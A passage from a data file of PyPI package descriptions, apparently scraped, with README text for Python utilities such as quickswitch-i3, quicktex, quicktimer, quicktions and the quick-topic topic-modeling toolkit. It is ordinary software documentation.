the text less readable and does not clearly indicate what styles are being \"\"applied to the person inspecting the code.\\033[0m\")qs.xprint(\"Well, well, what do we have here? I'm a styled print statement as well, but there are no ANSI codes \"\"visible. It's just an additional parameter!\",color=\"blue\")ex_input=qs.xinput(\"This applies to inputs too!\")qs.xprint(\"This works for applying a text style as well.\",styles=\"bold\")qs.xprint(\"Or multiple...\",styles=[\"bold\",\"underline\"])# To apply a particular assortment of styles to multiple strings, you can create custom ANSI codes to apply in the futureqs.custom_codes[\"red_title\"]=qs.create_code(color=\"black\",bgcolor=\"red\",styles=\"bold\")qs.xprint(\"Not only do I possess the previously listed styles\",custom_code=\"red_title\")qs.xprint(\"but I do as well!\",custom_code=\"red_title\")# There are also modifiers for the content of the string itself, such asqs.xprint(\"a warning format,\",modifier=\"warning\")# ! a warning format, !qs.xprint(\"or prepending the text with the current time!\",modifier=\"time_display\")# [14:19:21] or prepending the text with the current time!# Default values can also be modifiedqs.defaults.values[\"color\"]=\"red\"qs.defaults.values[\"styles\"]=\"bold\"qs.defaults.values[\"modifier\"]=\"warning\"# Subsequent calls without explicit values resort to default valuesqs.xprint(\"I'm styled, yet the parameters aren't directly stated!\")# Specified values override defaultsqs.xprint(\"I'm still special!\",color=\"green\")# Reset function returns defaults to initial valuesqs.defaults.reset()# Strings can also be styled without being immediately printedstyled_string=qs.style_string(\"You can't see me...\",styles=\"italic\")"} +{"package": "quickSvg", "pacakge-description": "quick svg draw."} +{"package": "quickswitch-i3", "pacakge-description": "OverviewThis utility fori3, inspired byPentadactyl\u2019s:bufferscommand, allows\nyou to quickly switch to and locate windows on all your workspaces, using an\ninteractive dmenu prompt. It has since gained a lot of other functionality to\nmake working with i3 even more efficient.UsageFinding windowsThe core functionality of quickswitch is still finding windows and jumping to\nthem, and this is what it does when you call it without any options.Here\u2019s how it looks in action:However, sometimes you may want to grab a window and move it to your current\nworkspace. This can be done with the-m/--moveflag.A similiar feature is the-s/--scratchpadflag, which searches your\nscratchpad, and does ascratchpad showon the window you choose.You can also search and jump (or move) via regular expression using the-r/--regexflag, without using dmenu. This could be useful for\nscripting, or if you are a regex wizard who feels limited by dmenu.Workspacesquickswitch also provides a few functions to manage workspaces. First of\nall, it allows you to search workspaces in the same fashion as windows with the-w/--workspacesflag. This isextremelyuseful for working with many named\nworkspaces without having them bound to any particular key.Another useful feature is to quickly get an empty workspace. This is what the-e/--emptyflag does: it will jump you to the first empty, numbered\nworkspace.If you use this excessively, then your numbered workspaces might fragment a lot.\nYou can fix this easily with-g/--degap, which \u201cdefragments\u201d your\nworkspaces, without affecting their order (eg, [1, 4, 7] becomes [1, 2, 3] by\nrenaming 4 to 2 and 7 to 3).dmenuYou can influence how dmenu is called with the-d/--dmenuflag, which\nexpects a complete dmenu command. The default isdmenu-b-i-l20(which\nmakes dmenu appear on the bottom of your screen (-b) in a vertical manner with\nat most 20 lines (-l 20), and matches case insensitively (-i). See the man page\nfor dmenu for a list of options.Note:The versions of quickswitch before 2.0 used explicit flags for changing\ndmenu\u2019s behavior. This was rather inflexible, because it needed an explicit flag\nfor every dmenu option, and it hardcoded the dmenu command. For most people, the\ndefault should be fine, but if you want to change anything, this allows you to\ngo wild.Dependenciesquickswitch-i3 requires dmenu (which you likely already have installed), and\ni3-py, which you can install withpip installi3-py.quickswitch-i3 was tested in Python 2.7.3 and 3.2.3. It will not work in version\nprior to 2.7 due to the usage ofargparse.Installationquickswitch-i3 has a PyPI entry, so you can install it withpip installquickswitch-i3. Alternatively, you can always manually run the setup file withpython setup.py install.Additionally, if you are an Arch user, you can install it from the AUR. The\npackage is calledquickswitch-i3. The PKGBUILD is also included here.An overlay for Gentoo is in the works.Contributions\u2026are obviously welcome. Pretty much every feature in quickswitch originated\nbecause someone (not just me) thought \u201chey, this would be useful\u201d. Just shoot a\nPull Request.LicenseDisclaimer: quickswitch-i3 is a third party script and in no way affiliated\nwith the i3 project.This program is free software under the terms of the\nDo What The Fuck You Want To Public License.\nIt comes without any warranty, to the extent permitted by\napplicable law. For a copy of the license, see COPYING or\nhead tohttp://sam.zoy.org/wtfpl/COPYING."} +{"package": "quicktable", "pacakge-description": "No description available on PyPI."} +{"package": "quicktake", "pacakge-description": "QuickTakeOff-the-shelf computer vision ML models. Yolov5, gender and age determination.The goal of this repository is to provide, easy to use, abstracted, APIs to powerful computer vision models.Models$3$ models are currently available:Object detectionGender determinationAge determinationModel EngineThe modelsYoloV5: Object detection. This forms the basis of the other models. Pretrained onCOCO. DocumentationhereGender:ResNet18is used as the models backend. Transfer learning is applied to model gender. The additional gender training was done on thegender classification dataset, using code extract fromhere.Age: The age model is an implementation of theSSR-Netpaper:SSR-Net: A Compact Soft Stagewise Regression Network for Age Estimation. ThepyTorchmodel was largely derived fromoukohou.Getting StartedInstall the package with pip:pip install quicktakeUsageBuild an instance of the class:fromquicktakeimportQuickTakeImage InputEach model is designed to handle $3$ types of input:raw pixels (torch.Tensor): raw pixels of a single image. Used when streaming video input.image path (str): path to an image. Used when processing a single image.image directory (str): path to a directory of images. Used when processing a directory of images.Expected UseGenderandagedetermination models are trained on faces. They work fine on a larger image, however, will fail to make multiple predictions in the case of multiple faces in a single image.The API is currently designed to chain models:yolois used to identify objects.IFa person is detected, thegenderandagemodels are used to make predictions.This is neatly bundled in theQuickTake.yolo_loop()method.Getting StartedLaunch a webcam stream:QL=QuickTake()QL.launchStream()Note: Each model returns the resultsresults_as well as the runtimetime_.Run on a single frame:fromIPython.displayimportdisplayfromPILimportImageimportcv2# example imagesimg='./data/random/dave.png'# to avoid distractionsimportwarningswarnings.filterwarnings('ignore')# init modulefromquicktakeimportQuickTakeqt=QuickTake()# extract frame from raw image pathframe=qt.read_image(img)We can now fitqt.age()orqt.gender()on the frame. Alternatively we can cycle through the objects detected byyoloand if a person is detected, fitqt.age()andqt.gender():# generate pointsfor_label,x0,y0,x1,y1,colour,thickness,results,res_df,age_,gender_inqt.yolo_loop(frame):_label=QuickTake.generate_yolo_label(_label)QuickTake.add_block_to_image(frame,_label,x0,y0,x1,y1,colour=colour,thickness=thickness)The result is an image with the bounding boxes and labels, confidence (in yolo prediction), age, and gender if a person is detected..The staged output is also useful:.For a more comprehensiveexampledirectory.FutureI have many more models; deployment methods & applications in the pipeline.If you wish to contribute, please email me@zachcolinwolpe@gmail.com."} +{"package": "quick-templates", "pacakge-description": "No description available on PyPI."} +{"package": "quicktest", "pacakge-description": "# quicktestA nano-framework for quickly unit testing pure functions.Useful as a helper for solvinghttps://www.dailycodingproblem.com/challenges and the like."} +{"package": "quicktester", "pacakge-description": "quicktester is a set of plugins that can be used to quickly runrelevant tests cases.The git-changes plugin will only run tests that are relevant to the\nmodified files, according to git. The fail-only plugin will only run\ntests that have failed in the last few runs. The statistics plugin\ncollects statistics for the fail-only plugin. The quickfix plugin\nhelps vim users to have error traces in a quickfix format."} +{"package": "quicktests", "pacakge-description": "quicktestsA library for python for easy testing.ExampleExample 1: TestBasefromquicktestsimportprint_report,TestBaseclassTest(TestBase):deftest_one_equals_one(self):assert1==1,\"One does not equal one\"deftest_one_equals_one_str(self):assert\"One\"==\"One\",\"\\\"One\\\"does not equal\\\"One\\\"\"if__name__=='__main__':print_report(Test())The code above provides the following information:Ran 2 tests.\nRunning tests took 4.887580871582031e-05 seconds.\nNo failed tests.\nNo errors were found. Add more code to verify your code is working.Example 2: MiniTestfromquicktestsimportprint_report,MiniTestif__name__=='__main__':defcomplex_test():returnFalseprint_report(MiniTest(test_true=[lambda:True,\"Returns True\"],test_false=[lambda:False,\"Returns False\"],test_error=[lambda:1/0,\"This is wrong\"],test_complex=[complex_test,\"This is complex\"],test_with_really_long_name=[lambda:False,\"This is a long name\",]))The code above provides the following information:Ran 5 tests.\nRunning tests took 4.076957702636719e-05 seconds.\n4 failed tests:\n1. test 'complex': -> This is complex\n2. test 'error': -> division by zero\n3. test 'false': -> Returns False\n5. test 'with really long name': -> This is a long name"} +{"package": "quicktex", "pacakge-description": "QuicktexA python library for using DDS filesQuicktex is a python library and command line tool for encoding and decoding DDS files.\nIt is based on theRGBCX encoder, which is currently\none of thehighest quality S3TC encoders available.\nQuicktex has a python front end, but the encoding and decoding is all done in C++ for speed\ncomparable to the original library.InstallationFrom Wheel (Easiest)To install, runpipinstallquicktexIf you are on macOS, You need to install openMP from homebrew:brewinstalllibompFrom SourceTo build from source, first clone this repo and cd into it, then run:gitsubmoduleupdate--init\npipinstall.and setuptools will take care of any dependencies for you.If you are on macOS, it is recommended to first install openMP from homebrew to enable\nmultithreading, since it is not included in the default Apple Clang install:brewinstalllibompThe package also makes tests, stub generation, and docs available. To install the\nrequired dependencies for them, install with options like so:pipinstall.[tests,stubs,docs]UsageUsage: quicktex [OPTIONS] COMMAND [ARGS]...\n\n Encode and Decode various image formats\n\nOptions:\n --version Show the version and exit.\n --help Show this message and exit.\n\nCommands:\n decode Decode DDS files to images.\n encode Encode images to DDS files of the given format.To decode DDS files to images, use thedecodesubdommand, along with a glob or a\nlist of files to decode.To encode images to DDS files, use theencodesubcommand, plus an additional\nsubcommand for the format. For example,quicktex encode bc1 bun.pngwill encode\nbun.png in the current directory to a bc1/DXT1 dds file next to it.encodeanddecodeboth accept several common parameters:-f, --flip / -F, --no-flip: Vertically flip image before/after converting.\n[default: True]-r, --remove: Remove input images after converting.-s, --suffix TEXT: Suffix to append to output filename(s).\nIgnored ifoutputis a single file.-o, --output: Output file or directory. If outputting to a file, input filenames\nmust be only a single item. By default, files are converted in place."} +{"package": "quicktick", "pacakge-description": "Output a cryptocurrency price ticker to stdout based on the\nconfiguration found, by default, in~/.quicktick. Options can be\nprovided at the command line to override any part of the ticker\nconfiguration.Installationquicktick requires Python 3.6, or newer, and can be installed usingpip:pip install quicktickUsagequicktick [-h] [-V] [--config CONFIG] [--crypto CRYPTO] [--fiat FIAT] [--template TEMPLATE] [--source SOURCE]Options are as follows:-h,--helpShow this help message and exit-V,--versionShow version and license information--configCONFIGUse alternative configuration file--cryptoCRYPTOSymbol to use as the cryptocurrency--fiatFIATSymbol to use as the fiat currency--templateTEMPLATETemplate name or raw Jinja2 template--sourceSOURCESource for the price dataConfigurationThe configuration is a YAML file, which will be created in your home\ndirectory on first run (if it doesn\u2019t already exist), which defines the\ndefault ticker, how to output price data and how data sources are\ndefined. Jinja2 templating is used to make this very adaptable to your\nneeds.The default configuration only defines a data source for theCoinMarketCapAPI with support for:Cryptocurrencies:BitcoinBitcoin CashEthereumLitecoinFiat currencies:US DollarsEurosChinese YuanBritish PoundsPrice data:Exchange rateChange in the last hourCoinMarketCap\u2019s API supports many more options and these can be added to\nyour configuration, as needed. Alternatively, other JSON-based HTTP APIs\ncan be defined as data sources.TickerThe default ticker is defined under thetickersection in the\nconfiguration. It takes four attributes:sourceThe data source to use, defined in thesourcessection.cryptoThe cryptocurrency symbol to use, as defined by thesource.fiatThe fiat currency symbol to use, as defined by thesource.templateThe template to use to render the ticker, defined in thetemplatessection (n.b., this must be a predefined template; a raw Jinja2\ntemplate string can only be used at the command line).TemplatesThetemplatessection is used to define named Jinja2 templates. By\ndefault, there issimpleandansi(which is the same assimple, with ANSI escape sequences used for colour output). When the\ntemplates are rendered, they have access to three sets of data:fiatThe fiat currency symbol (seeData Sourcesfor details).cryptoThe cryptocurrency symbol (seeData Sourcesfor details).Price dataThe price data variables returned by the data source (seeData\nSourcesfor details).Data SourcesThesourcessection is used to define named data sources; that is,\nJSON-based HTTP APIs. Each data source takes four attributes:urlThe URL for the data source; again, a Jinja2 template that is supplied\nwith thefiatandcryptosymbols.dataThis subsection allows you to define the price data variables that are\navailable to the output template. These are again Jinja2 templates\nthat describe the mapping from the API\u2019sjsonresponse, along with\nthecryptoandfiatsymbols.cryptosandfiatsThese subsections allow you to define cryptocurrencies and fiat\ncurrencies, respectively. Conventionally, you would use the symbol\nname as the currency\u2019s identifier, which take a dictionary of named\nparameters. These parameters are then available to the templates that\nuse the symbols.LicenseCopyright (c) 2017 Christopher HarrisonThis program is free software: you can redistribute it and/or modify it\nunder the terms of the GNU General Public License as published by the\nFree Software Foundation, either version 3 of the License, or (at your\noption) any later version.This program is distributed in the hope that it will be useful, but\nWITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General\nPublic License for more details.You should have received a copy of the GNU General Public License along\nwith this program. If not, see ."} +{"package": "quick-time", "pacakge-description": "instant timequick time"} +{"package": "quicktimekeeper", "pacakge-description": "QuickTimeKeeperQuickTimeKeeper is a small Python library for timing how long functions take to run.UsageSimply import QuickTimeKeeper and call thetime_functionmethod to time any function you pass in as the parameter. It returns how long the function took to run. Optionally, you can pass in extra args totime_functionwhich will be passed into the function to time.importquicktimekeeperasquicktimerdeffibonacci(n):ifn<2:returnnelse:returnfibonacci(n-1)+fibonacci(n-2)time_taken=quicktimer.time_function(fibonacci,n=10)print(f\"It took{time_taken}ms to run fibonacci(10)\")"} +{"package": "quicktimer", "pacakge-description": "TimerAn easy to use python package to handle time measurements in code.Instantiate theTimerclass and insert one-liners withtake_time()between your existing code to take timestamps.Call thefancy_print()function to print a nicely formatted overview of how much time has passed overall, how much time has passed between thetake_time()calls, including percentage per step and passed step-descriptions.InstallationThe package is available onPyPi:pip install quicktimerUsageThe entire functionality is documented in-depth onreadthedocs.\nIn the following a quick overview of the basic functionality is shown.The two main commands aretake_time()andfancy_print().Both can be used without any parameters, although you should pass at least a description totake_time(\"Finished_x!\")to add some context to your measurements.You can either make use of the default output method (printto the console) or you can pass a custom function: for instance to pass the messages to a logger.Using the default output method (print)When nooutput_funcparameter is passed during instantiation, it defaults toprintthe messages to the console as follows:importtimefromquicktimerimportTimerT=Timer()# take the starting timeT.take_time(description=\"The description of the first function-call is not displayed!\")time.sleep(1.1)# code substitute: parsing the dataT.take_time(\"Parsed the data\")time.sleep(0.02)# code substituteT.take_time()time.sleep(0.1)# code substitute: Storing the dataT.take_time(\"Stored the data\",True)T.fancy_print()Output of the code in the console:> Stored the data\n> ------ Time measurements ------\n> Overall: 0:00:01.254049\n> Step 0: 0:00:01.113962 - 88.83 % - Description: Parsed the data\n> Step 1: 0:00:00.030001 - 2.39 % - Description: \n> Step 2: 0:00:00.110086 - 8.78 % - Description: Stored the dataUsing a logger as output methodInstead ofprintingto the console, you can also pass your own function to the module.\nThis can be used with an easily configuredloggerto write the messages to your log.importtimeimportloggingfromquicktimerimportTimer# setting up a loggermy_format=\"%(asctime)s[%(levelname)-5.5s]%(message)s\"logging.basicConfig(filename='test.log',level=logging.INFO,format=my_format)logger=logging.getLogger()# logger.info will be used as the output function instead of printT=Timer(output_func=logger.info)T.take_time()# take the starting timetime.sleep(0.5)# code substitute: parsing the dataT.take_time(\"Parsed the data\")time.sleep(0.1)# code substitute: Storing the dataT.take_time(\"Stored the data\",True)T.fancy_print()Your log would look like this:2021-06-24 13:35:43,275 [INFO ] Stored the data\n2021-06-24 13:35:43,275 [INFO ] ------ Time measurements ------\n2021-06-24 13:35:43,275 [INFO ] Overall: 0:00:00.624691\n2021-06-24 13:35:43,275 [INFO ] Step 0: 0:00:00.512639 - 82.06 % - Description: Parsed the data\n2021-06-24 13:35:43,275 [INFO ] Step 1: 0:00:00.112052 - 17.94 % - Description: Stored the data"} +{"package": "quicktions", "pacakge-description": "Python\u2019sFractiondata type is an excellent way to do exact calculations\nwith unlimited rational numbers and largely beatsDecimalin terms of\nsimplicity, accuracy and safety. Clearly not in terms of speed, though,\ngiven the cdecimal accelerator in Python 3.3+.quicktionsis an adaptation of the originalfractionsmodule\n(as included in CPython 3.11) that is compiled and optimised withCythoninto a fast, native extension module.Compared to the standard libraryfractionsmodule of CPython,\ncomputations inquicktionsare about10x faster in Python 2.7 and 3.46x faster in Python 3.53-4x faster in Python 3.10Compared to thefractionsmodule in CPython 3.10, instantiation of aFractioninquicktionsis also5-15x faster from a floating point string value (e.g.Fraction(\"123.456789\"))3-5x faster from a floating point value (e.g.Fraction(123.456789))2-4x faster from an integer numerator-denominator pair (e.g.Fraction(123, 456))We provide a set of micro-benchmarks here:https://github.com/scoder/quicktions/tree/master/benchmarkAs of quicktions 1.12, the different number types and implementations compare\nas follows in CPython 3.10:Average times for all 'create' benchmarks:\nfloat : 36.17 us (1.0x)\nDecimal : 111.71 us (3.1x)\nFraction : 111.98 us (3.1x)\nPyFraction : 398.80 us (11.0x)\n\nAverage times for all 'compute' benchmarks:\nfloat : 4.53 us (1.0x)\nDecimal : 16.62 us (3.7x)\nFraction : 72.91 us (16.1x)\nPyFraction : 251.93 us (55.6x)While not as fast as the C implementeddecimalmodule in Python 3,quicktionsis about 15x faster than the Python implementeddecimalmodule in Python 2.7.For documentation, see the Python standard library\u2019sfractionsmodule:https://docs.python.org/3/library/fractions.htmlChangeLog1.16 (2024-01-10)Formatting support was improved, following CPython 3.13a3 as ofhttps://github.com/python/cpython/pull/111320Add support for Python 3.13 by using Cython 3.0.8 and callingmath.gcd().1.15 (2023-08-27)Add support for Python 3.12 by using Cython 3.0.2.1.14 (2023-03-19)Implement__format__forFraction, followinghttps://github.com/python/cpython/pull/100161ImplementFraction.is_integer(), followinghttps://github.com/python/cpython/issues/100488Fraction.limit_denominator()is faster, followinghttps://github.com/python/cpython/pull/93730Internal creation of result Fractions is about 10% faster if the calculated\nnumerator/denominator pair is already normalised, followinghttps://github.com/python/cpython/pull/101780Built using Cython 3.0.0b1.1.13 (2022-01-11)Parsing very long numbers from a fraction string was very slow, even slower\nthanfractions.Fraction. The parser is now faster in all cases (and\nstill much faster for shorter numbers).Fractiondid not implement__int__.https://bugs.python.org/issue445471.12 (2022-01-07)Faster and more space friendly pickling and unpickling.https://bugs.python.org/issue44154Algorithmically faster arithmetic for large denominators, although slower for\nsmall fraction components.https://bugs.python.org/issue43420Original patch for CPython by Sergey B. Kirpichev and Raymond Hettinger.Make surebool(Fraction)always returns abool.https://bugs.python.org/issue39274Built using Cython 3.0.0a10.1.11 (2019-12-19)FixOverflowErrorwhen parsing string values with long decimal parts.1.10 (2019-08-23)hash(fraction)is substantially faster in Py3.8+, following an optimisation\nin CPython 3.9 (https://bugs.python.org/issue37863).New methodfraction.as_integer_ratio().1.9 (2018-12-26)Substantially faster normalisation (and therefore instantiation) in Py3.5+.//(floordiv) now follows the expected rounding behaviour when used with\nfloats (by converting to float first), and is much faster for integer operations.Fix return type of divmod(), where the first item should be an integer.Further speed up mod and divmod operations.1.8 (2018-12-26)Faster mod and divmod calculation.1.7 (2018-10-16)Faster normalisation and fraction string parsing.Add support for Python 3.7.Built using Cython 0.29.1.6 (2018-03-23)Speed up Fraction creation from a string value by 3-5x.Built using Cython 0.28.1.1.5 (2017-10-22)Result of power operator (**) was not normalised for negative values.Built using Cython 0.27.2.1.4 (2017-09-16)Rebuilt using Cython 0.26.1 to improve support of Python 3.7.1.3 (2016-07-24)repair the faster instantiation from Decimal values in Python 3.6avoid potential glitch for certain large numbers in normalisation under Python 2.x1.2 (2016-04-08)change hash function in Python 2.x to match that offractions.Fraction1.1 (2016-03-29)faster instantiation from float valuesfaster instantiation from Decimal values in Python 3.61.0 (2015-09-10)Fraction.imagproperty could return non-zeroparsing strings with long fraction parts could use an incorrect scale0.7 (2014-10-09)faster instantiation from float and string valuesfix test in Python 2.x0.6 (2014-10-09)faster normalisation (and thus instantiation)0.5 (2014-10-06)faster math operations0.4 (2014-10-06)enable legacy division support in Python 2.x0.3 (2014-10-05)minor behavioural fixes in corner cases under Python 2.x\n(now passes all test in Py2.7 as well)0.2 (2014-10-03)cache hash value of Fractions0.1 (2014-09-24)initial public release"} +{"package": "quicktok", "pacakge-description": "No description available on PyPI."} +{"package": "quicktools", "pacakge-description": "quicktoolsThis is a python functions tools module for enhancing python grammar structures and functions"} +{"package": "quick-topic", "pacakge-description": "Quick Topic Mining Toolkit (QTMT)Thequick-topictoolkit allows us to quickly evaluate topic models in various methods.FeaturesTopic Prevalence Trends AnalysisTopic Interaction Strength AnalysisTopic Transition AnalysisTopic Trends of Numbers of Document Containing KeywordsTopic Trends Correlation AnalysisTopic Similarity between TrendsSummarize Sentence Numbers By KeywordsTopic visualizationThis version supports topic modeling from both English and Chinese text.Basic UsageExample: generate topic models for each category in the dataset filesfromquick_topic.topic_modeling.ldaimportbuild_lda_models# step 1: data filemeta_csv_file=\"datasets/list_country.csv\"raw_text_folder=\"datasets/raw_text\"# term files used for word segementationlist_term_file=[\"../datasets/keywords/countries.csv\",\"../datasets/keywords/leaders_unique_names.csv\",\"../datasets/keywords/carbon2.csv\"]# removed wordsstop_words_path=\"../datasets/stopwords/hit_stopwords.txt\"# run shelllist_category=build_lda_models(meta_csv_file=meta_csv_file,raw_text_folder=raw_text_folder,output_folder=\"results/topic_modeling\",list_term_file=list_term_file,stopwords_path=stop_words_path,prefix_filename=\"text_\",num_topics=6)GUIAfter installing thequick-topicpackage, runqtmtin the Terminal to call the GUI application.$ qtmtAdvanced UsageExample 1: Topic Prevalence over Timefromquick_topic.topic_prevalence.mainimport*# data file: a csv file; a folder with txt files named the same as the ID field in the csv filemeta_csv_file=\"datasets/list_country.csv\"text_root=r\"datasets/raw_text\"# word segmentation data fileslist_keywords_path=[\"../datasets/keywords/countries.csv\",\"../datasets/keywords/leaders_unique_names.csv\",\"../datasets/keywords/carbon2.csv\"]# remove keywordsstop_words_path=\"../datasets/stopwords/hit_stopwords.txt\"# date range for analysisstart_year=2010end_year=2021# used topicslabel_names=['\u7ecf\u6d4e\u4e3b\u9898','\u80fd\u6e90\u4e3b\u9898','\u516c\u4f17\u4e3b\u9898','\u653f\u5e9c\u4e3b\u9898']topic_economics=['\u6295\u8d44','\u878d\u8d44','\u7ecf\u6d4e','\u79df\u91d1','\u653f\u5e9c','\u5c31\u4e1a','\u5c97\u4f4d','\u5de5\u4f5c','\u804c\u4e1a','\u6280\u80fd']topic_energy=['\u7eff\u8272','\u6392\u653e','\u6c22\u80fd','\u751f\u7269\u80fd','\u5929\u7136\u6c14','\u98ce\u80fd','\u77f3\u6cb9','\u7164\u70ad','\u7535\u529b','\u80fd\u6e90','\u6d88\u8017','\u77ff\u4ea7','\u71c3\u6599','\u7535\u7f51','\u53d1\u7535']topic_people=['\u5065\u5eb7','\u7a7a\u6c14\u6c61\u67d3','\u5bb6\u5ead','\u80fd\u6e90\u652f\u51fa','\u884c\u4e3a','\u4ef7\u683c','\u7a7a\u6c14\u6392\u653e\u7269','\u6b7b\u4ea1','\u70f9\u996a','\u652f\u51fa','\u53ef\u518d\u751f','\u6db2\u5316\u77f3\u6cb9\u6c14','\u6c61\u67d3\u7269','\u56de\u6536','\u6536\u5165','\u516c\u6c11','\u6c11\u4f17']topic_government=['\u5b89\u5168','\u80fd\u6e90\u5b89\u5168','\u77f3\u6cb9\u5b89\u5168','\u5929\u7136\u6c14\u5b89\u5168','\u7535\u529b\u5b89\u5168','\u57fa\u7840\u8bbe\u65bd','\u96f6\u552e\u4e1a','\u56fd\u9645\u5408\u4f5c','\u7a0e\u6536','\u7535\u7f51','\u51fa\u53e3','\u8f93\u7535','\u7535\u7f51\u6269\u5efa','\u653f\u5e9c','\u89c4\u6a21\u7ecf\u6d4e']list_topics=[topic_economics,topic_energy,topic_people,topic_government]# run-allrun_topic_prevalence(meta_csv_file=meta_csv_file,raw_text_folder=text_root,save_root_folder=\"results/topic_prevalence\",list_keywords_path=list_keywords_path,stop_words_path=stop_words_path,start_year=start_year,end_year=end_year,label_names=label_names,list_topics=list_topics,tag_field=\"area\",time_field=\"date\",id_field=\"fileId\",prefix_filename=\"text_\",)Example 2: Estimate the strength of topic interaction (shared keywords) from different topicsfromquick_topic.topic_interaction.mainimport*# step 1: data filemeta_csv_file=\"datasets/list_country.csv\"text_root=r\"datasets/raw_text\"# step2: jieba cut words filelist_keywords_path=[\"../datasets/keywords/countries.csv\",\"../datasets/keywords/leaders_unique_names.csv\",\"../datasets/keywords/carbon2.csv\"]# remove filesstopwords_path=\"../datasets/stopwords/hit_stopwords.txt\"# set predefined topic labelslabel_names=['\u7ecf\u6d4e\u4e3b\u9898','\u80fd\u6e90\u4e3b\u9898','\u516c\u4f17\u4e3b\u9898','\u653f\u5e9c\u4e3b\u9898']# set keywords for each topictopic_economics=['\u6295\u8d44','\u878d\u8d44','\u7ecf\u6d4e','\u79df\u91d1','\u653f\u5e9c','\u5c31\u4e1a','\u5c97\u4f4d','\u5de5\u4f5c','\u804c\u4e1a','\u6280\u80fd']topic_energy=['\u7eff\u8272','\u6392\u653e','\u6c22\u80fd','\u751f\u7269\u80fd','\u5929\u7136\u6c14','\u98ce\u80fd','\u77f3\u6cb9','\u7164\u70ad','\u7535\u529b','\u80fd\u6e90','\u6d88\u8017','\u77ff\u4ea7','\u71c3\u6599','\u7535\u7f51','\u53d1\u7535']topic_people=['\u5065\u5eb7','\u7a7a\u6c14\u6c61\u67d3','\u5bb6\u5ead','\u80fd\u6e90\u652f\u51fa','\u884c\u4e3a','\u4ef7\u683c','\u7a7a\u6c14\u6392\u653e\u7269','\u6b7b\u4ea1','\u70f9\u996a','\u652f\u51fa','\u53ef\u518d\u751f','\u6db2\u5316\u77f3\u6cb9\u6c14','\u6c61\u67d3\u7269','\u56de\u6536','\u6536\u5165','\u516c\u6c11','\u6c11\u4f17']topic_government=['\u5b89\u5168','\u80fd\u6e90\u5b89\u5168','\u77f3\u6cb9\u5b89\u5168','\u5929\u7136\u6c14\u5b89\u5168','\u7535\u529b\u5b89\u5168','\u57fa\u7840\u8bbe\u65bd','\u96f6\u552e\u4e1a','\u56fd\u9645\u5408\u4f5c','\u7a0e\u6536','\u7535\u7f51','\u51fa\u53e3','\u8f93\u7535','\u7535\u7f51\u6269\u5efa','\u653f\u5e9c','\u89c4\u6a21\u7ecf\u6d4e']# a list of topics abovelist_topics=[topic_economics,topic_energy,topic_people,topic_government]# if any keyword is the below one, then the keyword is removed from our considerationfilter_words=['\u4e2d\u56fd','\u56fd\u5bb6','\u5de5\u4f5c','\u9886\u57df','\u793e\u4f1a','\u53d1\u5c55','\u76ee\u6807','\u5168\u56fd','\u65b9\u5f0f','\u6280\u672f','\u4ea7\u4e1a','\u5168\u7403','\u751f\u6d3b','\u884c\u52a8','\u670d\u52a1','\u541b\u8054','\u7814\u7a76','\u5229\u7528','\u610f\u89c1']# dictionarieslist_country=['\u5df4\u897f','\u5370\u5ea6','\u4fc4\u7f57\u65af','\u5357\u975e']# run shellrun_topic_interaction(meta_csv_file=meta_csv_file,raw_text_folder=text_root,output_folder=\"results/topic_interaction/divided\",list_category=list_country,# a dictionary where each record contain a group of keywordsstopwords_path=stopwords_path,weights_folder='results/topic_interaction/weights',list_keywords_path=list_keywords_path,label_names=label_names,list_topics=list_topics,filter_words=filter_words,# set field namestag_field=\"area\",keyword_field=\"\",# ignore if keyword from csv exists in the texttime_field=\"date\",id_field=\"fileId\",prefix_filename=\"text_\",)Example 3: Divide datasets by year or year-monthBy year:fromquick_topic.topic_transition.divide_by_yearimport*divide_by_year(meta_csv_file=\"../datasets/list_g20_news_all_clean.csv\",raw_text_folder=r\"datasets\\g20_news_processed\",output_folder=\"results/test1/divided_by_year\",start_year=2000,end_year=2021,)By year-month:fromquick_topic.topic_transition.divide_by_year_monthimport*divide_by_year_month(meta_csv_file=\"../datasets/list_g20_news_all_clean.csv\",raw_text_folder=r\"datasets\\g20_news_processed\",output_folder=\"results/test1/divided_by_year_month\",start_year=2000,end_year=2021)Example 4: Show topic transition by yearfromquick_topic.topic_transition.transition_by_year_month_topicimport*label=\"\u7ecf\u6d4e\"keywords=['\u6295\u8d44','\u878d\u8d44','\u7ecf\u6d4e','\u79df\u91d1','\u653f\u5e9c','\u5c31\u4e1a','\u5c97\u4f4d','\u5de5\u4f5c','\u804c\u4e1a','\u6280\u80fd']show_transition_by_year_month_topic(root_path=\"results/test1/divided_by_year_month\",label=label,keywords=keywords,start_year=2000,end_year=2021)Example 5: Show keyword-based topic transition by year-month for keywords in addition to mean linesfromquick_topic.topic_transition.transition_by_year_month_termimport*root_path=\"results/news_by_year_month\"select_keywords=['\u71c3\u7164','\u50a8\u80fd','\u7535\u52a8\u6c7d\u8f66','\u6c22\u80fd','\u8131\u78b3','\u98ce\u7535','\u6c34\u7535','\u5929\u7136\u6c14','\u5149\u4f0f','\u53ef\u518d\u751f','\u6e05\u6d01\u80fd\u6e90','\u6838\u7535']list_all_range=[[[2010,2015],[2016,2021]],[[2011,2017],[2018,2021]],[[2009,2017],[2018,2021]],[[2011,2016],[2017,2021]],[[2017,2018],[2019,2021]],[[2009,2014],[2015,2021]],[[2009,2014],[2015,2021]],[[2009,2015],[2016,2021]],[[2008,2011],[2012,2015],[2016,2021]],[[2011,2016],[2017,2021]],[[2009,2012],[2013,2016],[2017,2021]],[[2009,2015],[2016,2021]]]output_figure_folder=\"results/figures\"show_transition_by_year_month_term(root_path=\"results/test1/divided_by_year_month\",select_keywords=select_keywords,list_all_range=list_all_range,output_figure_folder=output_figure_folder,start_year=2000,end_year=2021)Example 6: Get time trends of numbers of documents containing topic keywords with full text.fromquick_topic.topic_trends.trends_by_year_month_fulltextimport*# define a group of topics with keywords, each topic has a 